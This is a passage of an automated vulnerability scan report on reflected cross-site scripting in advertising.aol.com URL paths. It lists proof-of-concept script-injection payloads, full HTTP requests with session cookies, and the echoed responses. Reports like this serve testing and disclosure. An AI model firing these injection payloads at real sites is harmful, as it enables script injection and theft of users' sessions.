r s_265=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/e5869"-alert(1)-"7954e14cf3a/2/3/1397978719/";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javascript:,advert
...[SNIP]...

4.77. http://advertising.aol.com/token/2/3/1397978719/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://advertising.aol.com
Path:	/token/2/3/1397978719/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f3f59"><script>alert(1)</script>80ff9213020 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /f3f59"><script>alert(1)</script>80ff9213020/2/3/1397978719/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|27329332051D1158-60000108802F7C0B[CE]; s_pers=%20s_getnr%3D1315270057850-New%7C1378342057850%3B%20s_nrgvo%3DNew%7C1378342057854%3B; UNAUTHID=1.56118f34d7f711e0bb11edb33f645290.f2d4

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 16:49:12 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 16:49:12 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13474

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
<link rel="canonical" href="http://advertising.aol.com/f3f59"><script>alert(1)</script>80ff9213020/2/3/1397978719/" />
...[SNIP]...

4.78. http://advertising.aol.com/token/3/1/8239370/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://advertising.aol.com
Path:	/token/3/1/8239370/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8c676"-alert(1)-"c7ef434fbbc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /8c676"-alert(1)-"c7ef434fbbc/3/1/8239370/ HTTP/1.1
Host: advertising.aol.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
Cookie: s_vi=[CS]v1|2722E805851D03EA-400001380002FA31[CE]; s_pers=%20s_getnr%3D1314627287324-Repeat%7C1377699287324%3B%20s_nrgvo%3DRepeat%7C1377699287326%3B; UNAUTHID=1.a5de2f9cc54911e0b91bbfa5e75487be.f26b

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 17:16:52 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 17:16:52 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13392

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
r s_265=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/8c676"-alert(1)-"c7ef434fbbc/3/1/8239370/";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javascript:,advertisi
...[SNIP]...

4.79. http://advertising.aol.com/token/3/1/8239370/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://advertising.aol.com
Path:	/token/3/1/8239370/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c8003"><script>alert(1)</script>e599192043c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /c8003"><script>alert(1)</script>e599192043c/3/1/8239370/ HTTP/1.1
Host: advertising.aol.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
Cookie: s_vi=[CS]v1|2722E805851D03EA-400001380002FA31[CE]; s_pers=%20s_getnr%3D1314627287324-Repeat%7C1377699287324%3B%20s_nrgvo%3DRepeat%7C1377699287326%3B; UNAUTHID=1.a5de2f9cc54911e0b91bbfa5e75487be.f26b

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 17:16:48 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 17:16:48 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13462

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
<link rel="canonical" href="http://advertising.aol.com/c8003"><script>alert(1)</script>e599192043c/3/1/8239370/" />
...[SNIP]...

4.80. http://advertising.aol.com/token/3/3/1557169105/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://advertising.aol.com
Path:	/token/3/3/1557169105/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4c13a"-alert(1)-"8431ceb2f9d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /4c13a"-alert(1)-"8431ceb2f9d/3/3/1557169105/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|27329332051D1158-60000108802F7C0B[CE]; s_pers=%20s_getnr%3D1315270057850-New%7C1378342057850%3B%20s_nrgvo%3DNew%7C1378342057854%3B; UNAUTHID=1.56118f34d7f711e0bb11edb33f645290.f2d4

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 16:48:52 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 16:48:52 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13404

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
r s_265=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/4c13a"-alert(1)-"8431ceb2f9d/3/3/1557169105/";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javascript:,advert
...[SNIP]...

4.81. http://advertising.aol.com/token/3/3/1557169105/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://advertising.aol.com
Path:	/token/3/3/1557169105/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f6be9"><script>alert(1)</script>039211a30df was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /f6be9"><script>alert(1)</script>039211a30df/3/3/1557169105/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|27329332051D1158-60000108802F7C0B[CE]; s_pers=%20s_getnr%3D1315270057850-New%7C1378342057850%3B%20s_nrgvo%3DNew%7C1378342057854%3B; UNAUTHID=1.56118f34d7f711e0bb11edb33f645290.f2d4

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 16:48:49 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 16:48:49 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13474

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
<link rel="canonical" href="http://advertising.aol.com/f6be9"><script>alert(1)</script>039211a30df/3/3/1557169105/" />
...[SNIP]...

4.82. http://advertising.aol.com/token/4/1/1128450710/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://advertising.aol.com
Path:	/token/4/1/1128450710/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b3710"><script>alert(1)</script>7274af88a73 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /b3710"><script>alert(1)</script>7274af88a73/4/1/1128450710/ HTTP/1.1
Host: advertising.aol.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
Cookie: s_vi=[CS]v1|2722E805851D03EA-400001380002FA31[CE]; s_pers=%20s_getnr%3D1314627287324-Repeat%7C1377699287324%3B%20s_nrgvo%3DRepeat%7C1377699287326%3B; UNAUTHID=1.a5de2f9cc54911e0b91bbfa5e75487be.f26b

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 17:16:22 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 17:16:22 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13474

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
<link rel="canonical" href="http://advertising.aol.com/b3710"><script>alert(1)</script>7274af88a73/4/1/1128450710/" />
...[SNIP]...

4.83. http://advertising.aol.com/token/4/1/1128450710/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://advertising.aol.com
Path:	/token/4/1/1128450710/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 12f6f"-alert(1)-"bf6f65277d7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /12f6f"-alert(1)-"bf6f65277d7/4/1/1128450710/ HTTP/1.1
Host: advertising.aol.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
Cookie: s_vi=[CS]v1|2722E805851D03EA-400001380002FA31[CE]; s_pers=%20s_getnr%3D1314627287324-Repeat%7C1377699287324%3B%20s_nrgvo%3DRepeat%7C1377699287326%3B; UNAUTHID=1.a5de2f9cc54911e0b91bbfa5e75487be.f26b

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 17:16:25 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 17:16:25 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13404

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
r s_265=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/12f6f"-alert(1)-"bf6f65277d7/4/1/1128450710/";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javascript:,advert
...[SNIP]...

4.84. http://advertising.aol.com/token/4/3/708534695/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://advertising.aol.com
Path:	/token/4/3/708534695/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7aa06"-alert(1)-"a74428db3c9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /7aa06"-alert(1)-"a74428db3c9/4/3/708534695/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|27329332051D1158-60000108802F7C0B[CE]; s_pers=%20s_getnr%3D1315270057850-New%7C1378342057850%3B%20s_nrgvo%3DNew%7C1378342057854%3B; UNAUTHID=1.56118f34d7f711e0bb11edb33f645290.f2d4

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 16:48:33 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 16:48:33 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13400

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
r s_265=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/7aa06"-alert(1)-"a74428db3c9/4/3/708534695/";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javascript:,adverti
...[SNIP]...

4.85. http://advertising.aol.com/token/4/3/708534695/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://advertising.aol.com
Path:	/token/4/3/708534695/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 69bea"><script>alert(1)</script>1ced0c96631 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /69bea"><script>alert(1)</script>1ced0c96631/4/3/708534695/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|27329332051D1158-60000108802F7C0B[CE]; s_pers=%20s_getnr%3D1315270057850-New%7C1378342057850%3B%20s_nrgvo%3DNew%7C1378342057854%3B; UNAUTHID=1.56118f34d7f711e0bb11edb33f645290.f2d4

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 16:48:29 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 16:48:29 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13470

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
<link rel="canonical" href="http://advertising.aol.com/69bea"><script>alert(1)</script>1ced0c96631/4/3/708534695/" />
...[SNIP]...

4.86. http://advertising.aol.com/token/5/2/1348442932/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://advertising.aol.com
Path:	/token/5/2/1348442932/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 27601"><script>alert(1)</script>83001201018 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /27601"><script>alert(1)</script>83001201018/5/2/1348442932/ HTTP/1.1
Host: advertising.aol.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
Cookie: s_vi=[CS]v1|2722E805851D03EA-400001380002FA31[CE]; s_pers=%20s_getnr%3D1314627287324-Repeat%7C1377699287324%3B%20s_nrgvo%3DRepeat%7C1377699287326%3B; UNAUTHID=1.a5de2f9cc54911e0b91bbfa5e75487be.f26b

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 17:16:16 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 17:16:16 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13474

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
<link rel="canonical" href="http://advertising.aol.com/27601"><script>alert(1)</script>83001201018/5/2/1348442932/" />
...[SNIP]...

4.87. http://advertising.aol.com/token/5/2/1348442932/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://advertising.aol.com
Path:	/token/5/2/1348442932/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 27551"-alert(1)-"d17c7163a68 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /27551"-alert(1)-"d17c7163a68/5/2/1348442932/ HTTP/1.1
Host: advertising.aol.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
Cookie: s_vi=[CS]v1|2722E805851D03EA-400001380002FA31[CE]; s_pers=%20s_getnr%3D1314627287324-Repeat%7C1377699287324%3B%20s_nrgvo%3DRepeat%7C1377699287326%3B; UNAUTHID=1.a5de2f9cc54911e0b91bbfa5e75487be.f26b

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 17:16:19 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 17:16:19 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13404

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
r s_265=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/27551"-alert(1)-"d17c7163a68/5/2/1348442932/";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javascript:,advert
...[SNIP]...

4.88. http://advertising.aol.com/token/5/3/1649521156/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://advertising.aol.com
Path:	/token/5/3/1649521156/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 96a23"-alert(1)-"38b4441aa25 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /96a23"-alert(1)-"38b4441aa25/5/3/1649521156/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|27329332051D1158-60000108802F7C0B[CE]; s_pers=%20s_getnr%3D1315270057850-New%7C1378342057850%3B%20s_nrgvo%3DNew%7C1378342057854%3B; UNAUTHID=1.56118f34d7f711e0bb11edb33f645290.f2d4

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 16:48:25 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 16:48:25 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13404

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
r s_265=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
